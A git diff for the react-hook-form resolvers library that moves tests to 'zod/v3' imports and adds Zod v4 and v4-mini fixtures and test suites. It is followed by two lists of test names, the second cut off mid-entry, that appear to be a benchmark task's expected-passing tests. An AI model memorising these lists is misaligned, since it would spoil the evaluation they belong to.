diff --git a/standard-schema/src/__tests__/__fixtures__/data.ts b/standard-schema/src/__tests__/__fixtures__/data.ts index fc72250..7236799 100644 --- a/standard-schema/src/__tests__/__fixtures__/data.ts +++ b/standard-schema/src/__tests__/__fixtures__/data.ts @@ -1,6 +1,6 @@ import { StandardSchemaV1 } from '@standard-schema/spec'; import { Field, InternalFieldName } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; export const schema = z .object({ diff --git a/standard-schema/src/__tests__/standard-schema.ts b/standard-schema/src/__tests__/standard-schema.ts index b5c5391..b3c319d 100644 --- a/standard-schema/src/__tests__/standard-schema.ts +++ b/standard-schema/src/__tests__/standard-schema.ts @@ -1,5 +1,5 @@ import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { standardSchemaResolver } from '..'; import { customSchema, diff --git a/typebox/src/__tests__/typebox.ts b/typebox/src/__tests__/typebox.ts index 0085949..7fb7dfa 100644 --- a/typebox/src/__tests__/typebox.ts +++ b/typebox/src/__tests__/typebox.ts @@ -1,8 +1,8 @@ +import { Type } from '@sinclair/typebox'; +import { TypeCompiler } from '@sinclair/typebox/compiler'; import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; import { typeboxResolver } from '..'; import { fields, invalidData, schema, validData } from './__fixtures__/data'; -import { Type } from '@sinclair/typebox'; -import { TypeCompiler } from '@sinclair/typebox/compiler'; const shouldUseNativeValidation = false; diff --git a/typeschema/src/__tests__/Form-native-validation.tsx b/typeschema/src/__tests__/Form-native-validation.tsx index a1b8732..55c70bb 100644 --- a/typeschema/src/__tests__/Form-native-validation.tsx +++ b/typeschema/src/__tests__/Form-native-validation.tsx @@ -3,7 +3,7 @@ import user from '@testing-library/user-event'; import type { Infer } from '@typeschema/main'; import React from 'react'; import { useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { typeschemaResolver } from '..'; const USERNAME_REQUIRED_MESSAGE = 'username field is required'; diff --git a/typeschema/src/__tests__/Form.tsx b/typeschema/src/__tests__/Form.tsx index 173e799..51312a6 100644 --- a/typeschema/src/__tests__/Form.tsx +++ b/typeschema/src/__tests__/Form.tsx @@ -3,7 +3,7 @@ import user from '@testing-library/user-event'; import type { Infer } from '@typeschema/main'; import React from 'react'; import { useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { typeschemaResolver } from '..'; const schema = z.object({ diff --git a/typeschema/src/__tests__/__fixtures__/data.ts b/typeschema/src/__tests__/__fixtures__/data.ts index 3131067..d206eee 100644 --- a/typeschema/src/__tests__/__fixtures__/data.ts +++ b/typeschema/src/__tests__/__fixtures__/data.ts @@ -1,5 +1,5 @@ import { Field, InternalFieldName } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; export const schema = z .object({ diff --git a/typeschema/src/__tests__/typeschema.ts b/typeschema/src/__tests__/typeschema.ts index 5261fbd..a60ab07 100644 --- a/typeschema/src/__tests__/typeschema.ts +++ b/typeschema/src/__tests__/typeschema.ts @@ -1,6 +1,6 @@ import * as typeschema from '@typeschema/main'; import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { typeschemaResolver } from '..'; import { fields, invalidData, schema, validData } from './__fixtures__/data'; diff --git a/zod/src/__tests__/Form-native-validation.tsx b/zod/src/__tests__/Form-native-validation.tsx index 3ac296f..68957de 100644 --- a/zod/src/__tests__/Form-native-validation.tsx +++ b/zod/src/__tests__/Form-native-validation.tsx @@ -2,7 +2,7 @@ import { render, screen } from '@testing-library/react'; import user from '@testing-library/user-event'; import React from 'react'; import { useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { zodResolver } from '..'; const USERNAME_REQUIRED_MESSAGE = 'username field is required'; diff --git a/zod/src/__tests__/Form.tsx b/zod/src/__tests__/Form.tsx index ad78b48..d766924 100644 --- a/zod/src/__tests__/Form.tsx +++ b/zod/src/__tests__/Form.tsx @@ -2,7 +2,7 @@ import { render, screen } from '@testing-library/react'; import user from '@testing-library/user-event'; import React from 'react'; import { useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { zodResolver } from '..'; const schema = z.object({ diff --git a/zod/src/__tests__/__fixtures__/data.ts b/zod/src/__tests__/__fixtures__/data-v3.ts similarity index 98% rename from zod/src/__tests__/__fixtures__/data.ts rename to zod/src/__tests__/__fixtures__/data-v3.ts index f338f1d..4904ce2 100644 --- a/zod/src/__tests__/__fixtures__/data.ts +++ b/zod/src/__tests__/__fixtures__/data-v3.ts @@ -1,5 +1,5 @@ import { Field, InternalFieldName } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; export const schema = z .object({ diff --git a/zod/src/__tests__/__fixtures__/data-v4-mini.ts b/zod/src/__tests__/__fixtures__/data-v4-mini.ts new file mode 100644 index 0000000..11bab77 --- /dev/null +++ b/zod/src/__tests__/__fixtures__/data-v4-mini.ts @@ -0,0 +1,98 @@ +import { Field, InternalFieldName } from 'react-hook-form'; +import { z } from 'zod/v4-mini'; + +export const schema = z + .object({ + username: z + .string() + .check(z.regex(/^\w+$/), z.minLength(3), z.maxLength(30)), + password: z + .string() + .check( + z.regex(new RegExp('.*[A-Z].*'), 'One uppercase character'), + z.regex(new RegExp('.*[a-z].*'), 'One lowercase character'), + z.regex(new RegExp('.*\\d.*'), 'One number'), + z.regex( + new RegExp('.*[`~<>?,./!@#$%^&*()\\-_+="\'|{}\\[\\];:\\\\].*'), + 'One special character', + ), + z.minLength(8, 'Must be at least 8 characters in length'), + ), + repeatPassword: z.string(), + accessToken: z.union([z.string(), z.number()]), + birthYear: z.optional(z.number().check(z.minimum(1900), z.maximum(2013))), + email: z.optional(z.email()), + tags: z.array(z.string()), + enabled: z.boolean(), + url: z.union([z.url('Custom error url'), z.literal('')]), + like: z.optional( + z.array( + z.object({ + id: z.number(), + name: z.string().check(z.length(4)), + }), + ), + ), + dateStr: z + .pipe( + z.string(), + z.transform((value) => new Date(value)), + ) + .check( + z.refine((value) => !isNaN(value.getTime()), { + message: 'Invalid date', + }), + ), + }) + .check( + z.refine((obj) => obj.password === obj.repeatPassword, { + message: 'Passwords do not match', + path: ['confirm'], + }), + ); + +export const validData = { + username: 'Doe', + password: 'Password123_', + repeatPassword: 'Password123_', + birthYear: 2000, + email: 'john@doe.com', + tags: ['tag1', 'tag2'], + enabled: true, + accessToken: 'accessToken', + url: 'https://react-hook-form.com/', + like: [ + { + id: 1, + name: 'name', + }, + ], + dateStr: '2020-01-01', +} satisfies z.input<typeof schema>; + +export const invalidData = { + password: '___', + email: '', + birthYear: 'birthYear', + like: [{ id: 'z' }], + url: 'abc', +} as unknown as z.input<typeof schema>; + +export const fields: Record<InternalFieldName, Field['_f']> = { + username: { + ref: { name: 'username' }, + name: 'username', + }, + password: { + ref: { name: 'password' }, + name: 'password', + }, + email: { + ref: { name: 'email' }, + name: 'email', + }, + birthday: { + ref: { name: 'birthday' }, + name: 'birthday', + }, +}; diff --git a/zod/src/__tests__/__fixtures__/data-v4.ts b/zod/src/__tests__/__fixtures__/data-v4.ts new file mode 100644 index 0000000..7c6f55f --- /dev/null +++ b/zod/src/__tests__/__fixtures__/data-v4.ts @@ -0,0 +1,89 @@ +import { Field, InternalFieldName } from 'react-hook-form'; +import { z } from 'zod/v4'; + +export const schema = z + .object({ + username: z.string().regex(/^\w+$/).min(3).max(30), + password: z + .string() + .regex(new RegExp('.*[A-Z].*'), 'One uppercase character') + .regex(new RegExp('.*[a-z].*'), 'One lowercase character') + .regex(new RegExp('.*\\d.*'), 'One number') + .regex( + new RegExp('.*[`~<>?,./!@#$%^&*()\\-_+="\'|{}\\[\\];:\\\\].*'), + 'One special character', + ) + .min(8, 'Must be at least 8 characters in length'), + repeatPassword: z.string(), + accessToken: z.union([z.string(), z.number()]), + birthYear: z.number().min(1900).max(2013).optional(), + email: z.string().email().optional(), + tags: z.array(z.string()), + + enabled: z.boolean(), + url: z.string().url('Custom error url').or(z.literal('')), + like: z + .array( + z.object({ + id: z.number(), + name: z.string().length(4), + }), + ) + .optional(), + dateStr: z + .string() + .transform((value) => new Date(value)) + .refine((value) => !isNaN(value.getTime()), { + message: 'Invalid date', + }), + }) + .refine((obj) => obj.password === obj.repeatPassword, { + message: 'Passwords do not match', + path: ['confirm'], + }); + +export const validData = { + username: 'Doe', + password: 'Password123_', + repeatPassword: 'Password123_', + birthYear: 2000, + email: 'john@doe.com', + tags: ['tag1', 'tag2'], + enabled: true, + accessToken: 'accessToken', + url: 'https://react-hook-form.com/', + like: [ + { + id: 1, + name: 'name', + }, + ], + dateStr: '2020-01-01', +} satisfies z.input<typeof schema>; + +export const invalidData = { + password: '___', + email: '', + birthYear: 'birthYear', + like: [{ id: 'z' }], + url: 'abc', +} as unknown as z.input<typeof schema>; + +export const fields: Record<InternalFieldName, Field['_f']> = { + username: { + ref: { name: 'username' }, + name: 'username', + }, + password: { + ref: { name: 'password' }, + name: 'password', + }, + email: { + ref: { name: 'email' }, + name: 'email', + }, + birthday: { + ref: { name: 'birthday' }, + name: 'birthday', + }, +}; diff --git a/zod/src/__tests__/zod-v3.ts b/zod/src/__tests__/zod-v3.ts new file mode 100644 index 0000000..8e040ba --- /dev/null +++ b/zod/src/__tests__/zod-v3.ts @@ -0,0 +1,178 @@ +import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; +import { z } from 'zod/v3'; +import { zodResolver } from '..'; +import { fields, invalidData, schema, validData } from './__fixtures__/data-v3'; + +const shouldUseNativeValidation = false; + +describe('zodResolver', () => { + it('should return values from zodResolver when validation pass & raw=true', async () => { + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + raw: true, + })(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(parseAsyncSpy).toHaveBeenCalledTimes(1); + expect(result).toEqual({ errors: {}, values: validData }); + }); + + it('should return parsed values from zodResolver with `mode: sync` when validation pass', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(validData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result.errors).toEqual({}); + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver when validation fails', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver with `mode: sync` when validation fails', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(invalidData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`', async () => { + const result = await zodResolver(schema, undefined, { mode: 'sync' })( + invalidData, + undefined, + { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); + + it('should throw any error unrelated to Zod', async () => { + const schemaWithCustomError = schema.refine(() => { + throw Error('custom error'); + }); + const promise = zodResolver(schemaWithCustomError)(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + await expect(promise).rejects.toThrow('custom error'); + }); + + it('should enforce parse params type signature', async () => { + const resolver = zodResolver(schema, { + async: true, + path: ['asdf', 1234], + errorMap(iss, ctx) { + iss.path; + iss.code; + iss.path; + ctx.data; + ctx.defaultError; + return { message: 'asdf' }; + }, + }); + + resolver; + }); + + /** + * Type inference tests + */ + it('should correctly infer the output type from a zod schema', () => { + const resolver = zodResolver(z.object({ id: z.number() })); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: number }> + >(); + }); + + it('should correctly infer the output type from a zod schema using a transform', () => { + const resolver = zodResolver( + z.object({ id: z.number().transform((val) => String(val)) }), + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: string }> + >(); + }); + + it('should correctly infer the output type from a zod schema when a different input type is specified', () => { + const schema = z.object({ id: z.number() }).transform(({ id }) => { + return { id: String(id) }; + }); + + const resolver = zodResolver<{ id: number }, any, z.output<typeof schema>>( + schema, + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, any, { id: string }> + >(); + }); + + it('should correctly infer the output type from a Zod schema for the handleSubmit function in useForm', () => { + const schema = z.object({ id: z.number() }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: number; + }> + >(); + }); + + it('should correctly infer the output type from a Zod schema with a transform for the handleSubmit function in useForm', () => { + const schema = z.object({ id: z.number().transform((val) => String(val)) }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: string; + }> + >(); + }); +}); diff --git a/zod/src/__tests__/zod-v4-mini.ts b/zod/src/__tests__/zod-v4-mini.ts new file mode 100644 index 0000000..54c5681 --- /dev/null +++ b/zod/src/__tests__/zod-v4-mini.ts @@ -0,0 +1,182 @@ +import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; +import { z } from 'zod/v4-mini'; +import { zodResolver } from '..'; +import { + fields, + invalidData, + schema, + validData, +} from './__fixtures__/data-v4-mini'; + +const shouldUseNativeValidation = false; + +describe('zodResolver', () => { + it('should return values from zodResolver when validation pass & raw=true', async () => { + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + raw: true, + })(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + result; + + expect(parseAsyncSpy).toHaveBeenCalledTimes(1); + expect(result).toEqual({ errors: {}, values: validData }); + expectTypeOf(result.values); + }); + + it('should return parsed values from zodResolver with `mode: sync` when validation pass', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(validData, undefined, { fields, shouldUseNativeValidation }); + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result.errors).toEqual({}); + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver when validation fails', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver with `mode: sync` when validation fails', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(invalidData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`', async () => { + const result = await zodResolver(schema, undefined, { mode: 'sync' })( + invalidData, + undefined, + { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); + + it('should throw any error unrelated to Zod', async () => { + const schemaWithCustomError = schema.check( + z.refine(() => { + throw Error('custom error'); + }), + ); + const promise = zodResolver(schemaWithCustomError)(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + await expect(promise).rejects.toThrow('custom error'); + }); + + /** + * Type inference tests + */ + it('should correctly infer the output type from a zod schema', () => { + const resolver = zodResolver(z.object({ id: z.number() })); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: number }> + >(); + }); + + it('should correctly infer the output type from a zod schema using a transform', () => { + const resolver = zodResolver( + z.object({ + id: z.pipe( + z.number(), + z.transform((val) => String(val)), + ), + }), + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: string }> + >(); + }); + + it('should correctly infer the output type from a zod schema when a different input type is specified', () => { + const schema = z.pipe( + z.object({ id: z.number() }), + z.transform(({ id }) => { + return { id: String(id) }; + }), + ); + + const resolver = zodResolver<{ id: number }, any, z.output<typeof schema>>( + schema, + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, any, { id: string }> + >(); + }); + + it('should correctly infer the output type from a Zod schema for the handleSubmit function in useForm', () => { + const schema = z.object({ id: z.number() }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: number; + }> + >(); + }); + + it('should correctly infer the output type from a Zod schema with a transform for the handleSubmit function in useForm', () => { + const schema = z.object({ + id: z.pipe( + z.number(), + z.transform((val) => String(val)), + ), + }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: string; + }> + >(); + }); +}); diff --git a/zod/src/__tests__/zod.ts b/zod/src/__tests__/zod-v4.ts similarity index 93% rename from zod/src/__tests__/zod.ts rename to zod/src/__tests__/zod-v4.ts index 4b2f75b..0a043bc 100644 --- a/zod/src/__tests__/zod.ts +++ b/zod/src/__tests__/zod-v4.ts @@ -1,7 +1,7 @@ import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v4'; import { zodResolver } from '..'; -import { fields, invalidData, schema, validData } from './__fixtures__/data'; +import { fields, invalidData, schema, validData } from './__fixtures__/data-v4'; const shouldUseNativeValidation = false; @@ -92,6 +92,21 @@ describe('zodResolver', () => { await expect(promise).rejects.toThrow('custom error'); }); + it('should enforce parse params type signature', async () => { + const resolver = zodResolver(schema, { + jitless: true, + reportInput: true, + error(iss) { + iss.path; + iss.code; + iss.path; + return { message: 'asdf' }; + }, + }); + + resolver; + }); + /** * Type inference tests */
[ "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod-v4.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod-v4.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod-v4.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`" ]
[ "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "typanion/src/__tests__/typanion.ts > typanionResolver > should correctly infer the output type from a typanion schema", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should throw any error unrelated to Zod", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should correctly infer the output type from a zod schema", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should correctly infer the output type from a zod schema using a transform", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should correctly infer the output type from a zod schema when a different input type is specified", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return values from standardSchemaResolver when validation pass", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return a single error from standardSchemaResolver when validation fails", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return all the errors from standardSchemaResolver when validation fails with `validateAllFieldCriteria` set to true", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return values from standardSchemaResolver when validation pass & raw=true", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly handle path segments that are objects", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly infer the output type from a standardSchema schema", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly infer the output type from a standardSchema schema using a transform", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly infer the output type from a standardSchema schema when a different input type is specified", "zod/src/__tests__/zod-v4.ts > zodResolver > should throw any error unrelated to Zod", "zod/src/__tests__/zod-v4.ts > zodResolver > should enforce parse params type signature", "zod/src/__tests__/zod-v4.ts > zodResolver > should correctly infer the output type from a zod schema", "zod/src/__tests__/zod-v4.ts > zodResolver > should correctly infer the output type from a zod schema using a transform", "zod/src/__tests__/zod-v4.ts > zodResolver > should correctly infer the output type from a zod schema when a different input type is specified", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass", "vine/src/__tests__/vine.ts > vineResolver > should return a single error from vineResolver when validation fails", "vine/src/__tests__/vine.ts > vineResolver > should return all the errors from vineResolver when validation fails with `validateAllFieldCriteria` set to true", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass & raw=true", "vine/src/__tests__/vine.ts > vineResolver > should correctly infer the output type from a vine schema", "vine/src/__tests__/vine.ts > vineResolver > should correctly infer the output type from a vine schema using a transform", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should correctly infer the output type from a superstruct schema", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should correctly infer the output type from a computedTypes schema", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should correctly infer the output type from a computedTypes schema using a transform", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "yup/src/__tests__/yup.ts > yupResolver > should correctly infer the output type from a yup schema", "yup/src/__tests__/yup.ts > yupResolver > should correctly infer the output type from a yup schema using a transform", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should throw any error unrelated to TypeSchema", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should correctly infer the output type from a typeschema schema", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should correctly infer the output type from a typeschema schema using a transform", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should correctly infer the output type from a typeschema schema when a different input type is specified", "zod/src/__tests__/zod-v3.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod-v3.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod-v3.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod-v3.ts > zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod-v3.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod-v3.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod-v3.ts > zodResolver > should throw any error unrelated to Zod", "zod/src/__tests__/zod-v3.ts > zodResolver > should enforce parse params type signature", "zod/src/__tests__/zod-v3.ts > zodResolver > should correctly infer the output type from a zod schema", "zod/src/__tests__/zod-v3.ts > zodResolver > should correctly infer the output type from a zod schema using a transform", "zod/src/__tests__/zod-v3.ts > zodResolver > should correctly infer the output type from a zod schema when a different input type is specified", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants without errors", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants with errors", "valibot/src/__tests__/valibot.ts > valibotResolver > should correctly infer the output type from a valibot schema", "valibot/src/__tests__/valibot.ts > valibotResolver > should correctly infer the output type from a valibot schema using a transform", "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "typebox/src/__tests__/typebox.ts > typeboxResolver > should correctly infer the output type from a typebox schema", "typebox/src/__tests__/typebox.ts > typeboxResolver > should correctly infer the output type from a typebox schema with TypeCompiler", "typebox/src/__tests__/typebox.ts > typeboxResolver > should correctly infer the output type from a typebox schema using a transform", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return values when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Valibot", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "vine/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when validation fails", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "fluentvalidation-ts/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when some properties are undefined", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message for all validation failures", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized error message when requirement fails", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and 